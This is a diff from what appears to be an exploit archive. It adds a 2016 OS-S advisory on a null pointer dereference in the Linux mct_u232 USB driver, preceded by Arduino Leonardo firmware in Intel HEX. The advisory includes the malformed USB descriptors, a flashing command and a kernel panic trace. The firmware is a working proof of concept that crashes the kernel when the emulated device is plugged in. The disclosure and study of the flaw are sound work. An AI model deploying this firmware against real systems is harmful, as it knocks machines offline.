+:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 
+:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D 
+:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE 
+:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 
+:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 
+:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:10142400000000404C0544010001010203010902CF 
+:10143400270001010000FA0705810104040C0705D7 +:10144400010104000C0705820104000C07000700D9 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED 
+:1016F400757465207061796C6F616420300A0D0027
+:10170400526563762D446174613A0A0D005B444569
+:101714004255475D200953656E6420436F6E6669C8
+:101724006775726174696F6E44657363726970740E
+:101734006F720928696E6465783A2569292E2E2E00
+:101744000D0A005B44454255475D200953656E64AC
+:1017540020496E74657266616365204465736372C3
+:101764006970746F720928696E7465726661636565
+:101774003A2569292E2E2E0D0A005B444542554711
+:101784005D200953656E6420456E64706F696E74E4
+:101794002044657363726970746F720928656E649E
+:1017A400706F696E743A2569292E2E2E0D0A005B1E
+:1017B40044454255475D203C3C70616E6963206D31
+:1017C4006F64653F3E3E0D0A005B44454255475DEC
+:1017D4002009203E3E20537472696E67204465736D
+:1017E40063726970746F72207265717565737420A9
+:1017F4002D2073656E64696E67206D616C666F720F
+:101804006D656420737472696E67212073657475E5
+:10181400702E7756616C75654C203D3D2025690D11
+:101824000A005B48455844554D505D0A0D0025306B
+:041834003258200006
+:00000001FF
diff --git a/platforms/linux/dos/39541.txt b/platforms/linux/dos/39541.txt
new file mode 100755
index 000000000..07b0ff1fa
--- /dev/null
+++ b/platforms/linux/dos/39541.txt
@@ -0,0 +1,641 @@
+OS-S Security Advisory 2016-08
+Linux mct_u232 Nullpointer Dereference
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: not yet assigned
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
+USB device descriptors (mct_u232_m8 driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of advisory: https://os-s.net/advisories/OSS-2016-08_mct_u232.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
+device requiring the mct_u232_m8 driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
+(github.com/schumilo) using the following device descriptor:
+
+[*] Device-Descriptor
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x50d
+idProduct: 0x109
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+This is the configuration descriptor containing only one interrupt-endpoint-
+descriptor (IN-direction).
+The mct_u232 driver assumes that there will be at least two endpoint-
+descriptors configured as interrupt-in.
+Since there is no sanity check, it is possible that the kernel tries to
+dereference a null-pointer.
+This results in a crash of the system.
+
+****
+$ nm mct_u232.ko.debug | grep mct_u232_port_probe
+0000000000000fc0 t mct_u232_port_probe
+$ addr2line -e mct_u232.ko.debug 0xFF9
+/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
+64/drivers/usb/serial/mct_u232.c:386
+****
+
+**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/mct_u232.c)
+...
+377 static int mct_u232_port_probe(struct usb_serial_port *port)
+378 {
+379 struct mct_u232_private *priv;
+380
+381 priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+382 if (!priv)
+383 return -ENOMEM;
+384
+385 /* Use second interrupt-in endpoint for reading. */
+386 priv->read_urb = port->serial->port[1]->interrupt_in_urb; /* missing
+sanity check -> possible null-pointer dereference */
+387 priv->read_urb->context = port;
+388
+389 spin_lock_init(&priv->lock);
+390
+391 usb_set_serial_port_data(port, priv);
+392
+393 return 0;
+395 }
+...
+****
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x3
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81 ï?? IN-Direction
+bmAttribut: 0x3 ï?? Interrupt-Transfer
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1 ï??OUT-Direction
+bmAttribut: 0x2 ï??Bulk-Transfer
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82 ï??IN-Direction
+bmAttribut: 0x1 ï??Bulk-Transfer
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+Proof of Concept:
+For a proof of concept, we are providing an Arduino Leonardo firmware file. This
+firmware will emulate the defective USB device.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+The firmware has been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
+only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+To this day, no security patch was provided by the vendor.
+Since our 90-day Responsible Discourse deadline is expired, we publish this
+Security Advisory.
+
+References:
+https://bugzilla.redhat.com/show_bug.cgi?id=1283370
+
+Kernel Stacktrace:
+
+[ 2273.524650] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 2273.741789] usb 1-1: New USB device found, idVendor=050d, idProduct=0109
+[ 2273.749429] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 2273.757144] usb 1-1: Product: Ä?
+[ 2273.760821] usb 1-1: Manufacturer: Ä?
+[ 2273.763500] usb 1-1: SerialNumber: %
+[ 2273.768699] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
+says 96 microframes
+[ 2273.814069] usbcore: registered new interface driver mct_u232
+[ 2273.820979] usbserial: USB Serial support registered for MCT U232
+[ 2273.833864] mct_u232 1-1:1.0: MCT U232 converter detected
+[ 2273.838511] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000158
+[ 2273.839330] IP: [] mct_u232_port_probe+0x39/0x70 [mct_u232]
+[ 2273.839330] PGD 0
+[ 2273.839330] Oops: 0000 [#1] SMP
+[ 2273.839330] Modules linked in: mct_u232(+) ip6t_rpfilter ip6t_REJECT
+ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
+ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
+nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
+ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
+nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
+ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
+drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
+sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
+libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
+[ 2273.839330] CPU: 0 PID: 8890 Comm: systemd-udevd Not tainted
+3.10.0-229.14.1.el7.x86_64 #1
+[ 2273.839330] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
+rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
+[ 2273.839330] task: ffff88000f546660 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000
+[ 2273.839330] RIP: 0010:[] []
+mct_u232_port_probe+0x39/0x70 [mct_u232]
+[ 2273.839330] RSP: 0018:ffff88000f4cf908 EFLAGS: 00010286
+[ 2273.839330] RAX: ffff88000d9b49a0 RBX: ffff88000c34e800 RCX: 0000000000000000
+[ 2273.839330] RDX: 0000000000000000 RSI: ffff88000d9b49a0 RDI: ffff88000c34eab0
+[ 2273.839330] RBP: ffff88000f4cf910 R08: 00000000000163c0 R09: ffff88000e401c00
+[ 2273.839330] R10: ffffffffa0393fe3 R11: 0000000000000004 R12: 0000000000000000
+[ 2273.839330] R13: ffff88000c34e800 R14: ffffffffa0396000 R15: ffffffffa0396000
+[ 2273.839330] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
+knlGS:0000000000000000
+[ 2273.839330] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
+[ 2273.839330] CR2: 0000000000000158 CR3: 000000000f70c000 CR4:
+00000000000006f0
+[ 2273.839330] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
+0000000000000000
+[ 2273.839330] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
+[ 2273.839330] Stack:
+[ 2273.839330] ffff88000c34eab0 ffff88000f4cf940 ffffffff81461cf6 ffff88000c34eab0
+[ 2273.839330] ffff88000c34eab0 ffffffffa0396028 ffff88000c34eab0 ffff88000f4cf968
+[ 2273.839330] ffffffff813d30d7 ffffffffa0396028 ffff88000c34eab0 ffffffff813d33e0
+[ 2273.839330] Call Trace:
+[ 2273.839330] [] usb_serial_device_probe+0x56/0x110
+[ 2273.839330] [] driver_probe_device+0x87/0x390
+[ 2273.839330] [] ? driver_probe_device+0x390/0x390
+[ 2273.839330] [] __device_attach+0x3b/0x40
+[ 2273.839330] [] bus_for_each_drv+0x6b/0xb0
+[ 2273.839330] [] device_attach+0x88/0xa0
+[ 2273.839330] [] bus_probe_device+0x98/0xc0
+[ 2273.839330] [] device_add+0x4c4/0x7a0
+[ 2273.839330] [] usb_serial_probe+0x1123/0x1230
+[ 2273.839330] [] ? ida_get_new_above+0x7c/0x2a0
+[ 2273.839330] [] ? kmem_cache_alloc+0x1ba/0x1d0
+[ 2273.839330] [] ? sysfs_addrm_finish+0x42/0xe0
+[ 2273.839330] [] ? __sysfs_add_one+0x61/0x100
+[ 2273.839330] [] usb_probe_interface+0x1c4/0x2f0
+[ 2273.839330] [] driver_probe_device+0x87/0x390
+[ 2273.839330] [] __driver_attach+0x93/0xa0
+[ 2273.839330] [] ? __device_attach+0x40/0x40
+[ 2273.839330] [] bus_for_each_dev+0x73/0xc0
+[ 2273.839330] [] driver_attach+0x1e/0x20
+[ 2273.839330] [] usb_serial_register_drivers+0x29b/0x580
+[ 2273.839330] [] ? 0xffffffffa0398fff
+[ 2273.839330] [] usb_serial_module_init+0x1e/0x1000 [mct_u232]
+[ 2273.839330] [] do_one_initcall+0xb8/0x230
+[ 2273.839330] [] load_module+0x133e/0x1b40
+[ 2273.839330] [] ? ddebug_proc_write+0xf0/0xf0
+[ 2273.839330] [] ? copy_module_from_fd.isra.42+0x53/0x150
+[ 2273.839330] [] SyS_finit_module+0xa6/0xd0
+[ 2273.839330] [] system_call_fastpath+0x16/0x1b
+[ 2273.839330] Code: 00 00 48 89 e5 53 48 89 fb 48 8b 3d aa 3e aa e1 e8 9d 7a
+e1 e0 48 85 c0 74 38 48 8b 13 48 8d bb b0 02 00 00 48 89 c6 48 8b 52 28 <48>
+8b 92 58 01 00 00 48 89 10 48 89 9a b0 00 00 00 c7 40 08 00
+[ 2273.839330] RIP [] mct_u232_port_probe+0x39/0x70 [mct_u232]
+[ 2273.839330] RSP
+[ 2273.839330] CR2: 0000000000000158
+[ 2274.348716] ---[ end trace b239663354a1c556 ]---
+[ 2274.356144] Kernel panic - not syncing: Fatal exception
+[ 2274.357102] drm_kms_helper: panic occurred, switching back to text console
+
+Arduino Leonardo Firmware:
+
+:100000000C94A8000C94C5000C94C5000C94C50079
+:100010000C94C5000C94C5000C94C5000C94C5004C
+:100020000C94C5000C94C5000C94C4050C942F04CA
+:100030000C94C5000C94C5000C94C5000C94C5002C
+:100040000C94C5000C94C5000C94C5000C94C5001C
+:100050000C94C5000C94C5000C94C5000C940E02C1
+:100060000C94C5000C94C5000C94C5000C94C500FC
+:100070000C94C5000C94C5000C94C5000C94C500EC
+:100080000C94C5000C94C5000C94C5000C94C500DC
+:100090000C94C5000C94C5000C94C5000C94C500CC
+:1000A0000C94C5000C94C5000C94C5000B030E0302
+:1000B000010305032F032F032F03120316031A0353
+:1000C000200324032F032A030000000200080E006F
+:1000D00000030401000B000000000000000000000D
+:1000E00000000000000004080201104080401020C1
+:1000F00040804080080204018040201002011080EE
+:100100001020404004040404040304050202020217
+:1001100004030202020206060606060604040202A0
+:100120000204000000002300260029002C002F00FC
+:1001300000000000250028002B002E0031000000E8
+:100140000000240027002A002D00300000C180811B
+:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
+:10016000B1E0E4EDF3E102C005900D92A436B107D1
